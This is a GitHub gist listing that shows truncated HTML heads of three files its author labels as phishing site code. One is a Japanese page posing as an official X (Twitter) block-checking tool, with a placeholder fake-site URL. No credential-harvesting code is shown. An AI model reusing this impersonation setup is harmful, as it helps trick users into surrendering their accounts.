Skip to content

Instantly share code, notes, and snippets.

@ratorein
ratorein / index.html
Created October 31, 2025 11:52
Phishing site code
<!doctype html>
<html>
<head>
<meta charset="UTF-8" />
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<script src="https://cdn.jsdelivr.net/npm/@tailwindcss/browser@4"></script>
<style>
@keyframes gradient-shift {
0% { background-position: 0% 50%; }
@ratorein
ratorein / index.html
Created October 24, 2025 08:44
phishing site source
<!DOCTYPE html>
<html lang="ja">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>ブロックユーザー確認ツール - X (旧Twitter) 公式ツール</title>
<meta property="og:title" content="ブロックされているかを確認! | X (旧Twitter) ブロック確認ツール">
<meta property="og:description" content="アカウントを安全に分析し、誰にブロックされているかを瞬時にチェックします。">
<meta property="og:type" content="website">
<meta property="og:url" content="https://your-fake-site-url.com">
@ratorein
ratorein / index.html
Created October 23, 2025 02:04
Phishing site codes
<!doctype html>
<html>
<head>
<meta charset="UTF-8" />
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<script src="https://cdn.jsdelivr.net/npm/@tailwindcss/browser@4"></script>
<style>
@keyframes gradient-shift {
0% { background-position: 0% 50%; }
50% { background-position: 100% 50%; }